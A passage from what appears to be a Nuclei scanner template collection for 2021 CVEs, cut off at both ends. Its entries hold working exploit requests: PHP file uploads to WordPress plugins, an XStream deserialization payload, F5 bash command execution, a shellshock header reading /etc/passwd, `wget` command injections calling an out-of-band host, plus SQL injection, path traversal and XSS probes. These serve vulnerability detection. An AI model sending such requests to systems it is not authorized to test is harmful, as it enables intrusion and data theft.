name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["TOTOLINK"]},{"type":"word","part":"header_2","words":["Set-Cookie: SESSION_ID="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2021-24235","info":{"name":"WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["input/Autofocus/%0D*/Onfocus=alert(123);","goto-tour-list-js-extra"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-39165","info":{"name":"Cachet <=2.3.18 - SQL Injection","severity":"medium"},"requests":[{"raw":["@timeout: 20s\nGET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"pagination\") && contains(body, \"data\")"],"condition":"and"}]}]},{"id":"CVE-2021-4436","info":{"name":"3DPrint Lite < 1.9.1.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353\n\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"action\"\n\np3dlite_handle_upload\n-----------------------------54331109111293931601238262353\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: text/php\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------54331109111293931601238262353--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jsonrpc\":\"2.0\"","\"filename\":","{{filename}}.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-1472","info":{"name":"Cisco Small Business RV Series - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nCookie: sessionid='`wget http://{{interactsh-url}}`'\nAuthorization: QUt6NkpTeTE6dmk4cW8=\nContent-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536\n\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"option\"\n\n5NW9Cw1J\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"destination\"\n\nJ0I5k131j2Ku\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file.path\"\n\nEKsmqqg0\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"file\"; filename=\"config.xml\"\nContent-Type: application/xml\n\nqJ57CM9\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"filename\"\n\nJbYXJR74n.xml\n-----------------------------392306610282184777655655237536\nContent-Disposition: form-data; name=\"GXbLINHYkFI\"\n\n<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>\n-----------------------------392306610282184777655655237536--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["\"jsonrpc\":"]}]}]},{"id":"CVE-2021-46422","info":{"name":"SDT-CW3B1 1.1.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>"]},{"type":"word","name":"http","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2021-24316","info":{"name":"WordPress Mediumish Theme <=1.0.47 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(/{{randstr}}/)</script>","Sorry, no posts matched your criteria."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24215","info":{"name":"Controlled Admin Access WordPress Plugin <= 1.4.0 - Improper Access Control & Privilege Escalation","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"This page allows direct access to your site settings\") && contains(body_2, \"Controlled Admin Access\")"],"condition":"and"}]}]},{"id":"CVE-2021-37305","info":{"name":"Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["username\":\"admin","success\":true","result\":{"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32618","info":{"name":"Python Flask-Security - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=\\\\\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-22986","info":{"name":"F5 iControl REST -  Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /mgmt/shared/authn/login HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nAuthorization: Basic YWRtaW46\nContent-Type: application/json\nCookie: BIGIPAuthCookie=1234\nConnection: close\n\n{\"username\":\"admin\",\"userReference\":{},\"loginReference\":{\"link\":\"http://localhost/mgmt/shared/gossip\"}}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nX-F5-Auth-Token: {{token}}\nContent-Type: application/json\nConnection: close\n\n{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}\n"],"matchers":[{"type":"word","words":["commandResult","uid="],"condition":"and"}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["([A-Z0-9]{26})"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"commandResult\":\"(.*)\""],"part":"body"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27358","info":{"name":"Grafana Unauthenticated Snapshot Creation","severity":"high"},"requests":[{"raw":["POST /api/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"dashboard\": {\"editable\":false,\"hideControls\":true,\"nav\":[{\"enable\":false,\"type\":\"timepicker\"}],\"rows\": [{}],\"style\":\"dark\",\"tags\":[],\"templating\":{\"list\":[]},\"time\":{},\"timezone\":\"browser\",\"title\":\"Home\",\"version\":5},\"expires\": 3600}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25111","info":{"name":"WordPress English Admin <1.5.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-38147","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(header, 'application/vnd.openxml', 'attachment; filename=')","contains(body, '<?xml version=')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39350","info":{"name":"FV Flowplayer Video Player WordPress plugin  - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: 